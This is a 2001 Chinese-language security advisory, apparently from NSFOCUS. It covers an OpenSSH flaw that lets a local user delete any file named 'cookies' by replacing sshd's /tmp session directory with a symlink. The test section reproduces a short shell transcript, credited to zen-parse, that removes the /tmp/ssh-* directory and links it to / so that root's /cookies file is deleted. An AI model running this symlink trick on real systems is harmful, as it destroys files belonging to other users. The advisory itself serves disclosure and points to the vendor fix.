安全研究

安全漏洞
Openssh 删除任意用户cookies文件漏洞

发布日期:2001-06-05
更新日期:2001-06-08

受影响系统:

openssh 2.9p1
openssh 2.5.2p2
openssh 2.5.2p1
openssh 2.5.2
openssh 2.3.0p1
openssh 2.3.0
openssh 2.1.1
   - 各种Linux
   - SUN Solaris
   - FreeBSD
   - openBSD
   - NetBSD
   - AIX
   - IRIX
   - HP-UX
描述:

Openssh 是一个开放源码的免费GNU软件,用来提供一个安全高效的加密通信通道。

它存在一个安全问题,允许攻击者删除系统中任意一个名字为cookies的文件。

Openssh会在/tmp下创建一个临时目录来储存cookies,在用户退出ssh时,sshd会将此临时
目录中的cookies文件删除。但是它没有检查此临时目录是不是一个链接。攻击者可以创
建一个链接文件指向任意目录,就可以删除该目录下的cookies文件。

<*来源:zen-parse (zen-parse@gmx.net) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


zen-parse (zen-parse@gmx.net)提供了如下测试方法:

[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun  4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory



建议:

厂商补丁:

openssh已经在他们的CVS中修复了这个漏洞:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/

我们也建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.openssh.org


浏览次数:11517
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障